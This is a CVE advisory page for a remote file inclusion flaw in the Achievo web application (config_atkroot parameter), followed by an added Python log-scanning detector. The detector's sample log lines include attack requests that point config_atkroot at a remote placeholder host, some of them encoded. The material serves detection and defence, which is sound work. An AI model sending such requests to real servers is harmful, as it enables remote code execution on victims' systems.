CVE-2002-1435

Published: 11/04/2003 Updated: 05/09/2008
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

class.atkdateattribute.js.php in Achievo 0.7.0 up to and including 0.9.1, except 0.8.2, allows remote malicious users to execute arbitrary PHP code, when the 'allow_url_fopen' setting is enabled, via a URL in the config_atkroot parameter that points to the code.
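
Added example (not part of the advisory or of Achievo's code): a log check that flags requests to the script named above whose config_atkroot value is a remote URL. The access-log format, the /app/ path, the hosts and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

SCRIPT = "/class.atkdateattribute.js.php"  # file named in the advisory
PARAM = "config_atkroot"                   # parameter named in the advisory
# Wrappers that PHP resolves over the network when allow_url_fopen is on.
REMOTE = re.compile(r"\s*(?:https?|ftps?)://", re.IGNORECASE)
# Request field of a common/combined-format access log line (assumed format).
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def remote_atkroot(log_line):
    """Return the remote URL passed in config_atkroot, or None."""
    m = REQUEST.search(log_line)
    if m is None:
        return None
    target = urlsplit(m.group(1))
    if SCRIPT not in unquote(target.path).lower():
        return None
    # parse_qs percent-decodes once, like PHP does before the script runs.
    for value in parse_qs(target.query, keep_blank_values=True).get(PARAM, []):
        if REMOTE.match(value):
            return value
    return None

def scan(lines):
    """Return (line_number, value) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = remote_atkroot(line)
        if value is not None:
            hits.append((number, value))
    return hits

# Constructed sample lines; the /app/ path and hosts are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2003:10:00:00 +0000] "GET /app/class.atkdateattribute.js.php HTTP/1.0" 200 512',
    '198.51.100.7 - - [01/Jan/2003:10:00:05 +0000] "GET /app/class.atkdateattribute.js.php?config_atkroot=http://files.example.test/inc/ HTTP/1.0" 200 40',
    '198.51.100.7 - - [01/Jan/2003:10:00:09 +0000] "GET /app/class.atkdateattribute.js.php?config_atkroot=hTTp%3A%2F%2Ffiles.example.test%2Finc%2F HTTP/1.0" 200 40',
    '192.0.2.11 - - [01/Jan/2003:10:01:00 +0000] "GET /app/class.atkdateattribute.js.php?config_atkroot=../ HTTP/1.0" 200 512',
    '192.0.2.12 - - [01/Jan/2003:10:02:00 +0000] "GET /app/index.php?config_atkroot=http://files.example.test/inc/ HTTP/1.0" 200 900',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: {PARAM} points at remote URL {value!r}")
```

Any request that sets config_atkroot at all is unusual for a configuration value, so the non-URL case on line 4 of the sample may still merit review even though this check does not flag it.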

Vulnerable Product

achievo achievo 0.7.1

achievo achievo 0.8.0 rc1

achievo achievo 0.8.0

achievo achievo 0.8.1

achievo achievo 0.8.0 rc2

achievo achievo 0.7.2

achievo achievo 0.9.1

achievo achievo 0.7.3

achievo achievo 0.9.0

achievo achievo 0.7.0

Exploits

source: www.securityfocus.com/bid/5552/info Achievo includes a PHP script which is used to generate JavaScript (class.atkdateattribute.js.php). This script employs a number of PHP include_once() statements to call code contained in function libraries and grab configuration information. Attackers may subvert the variable ($config_atkroot) wh ...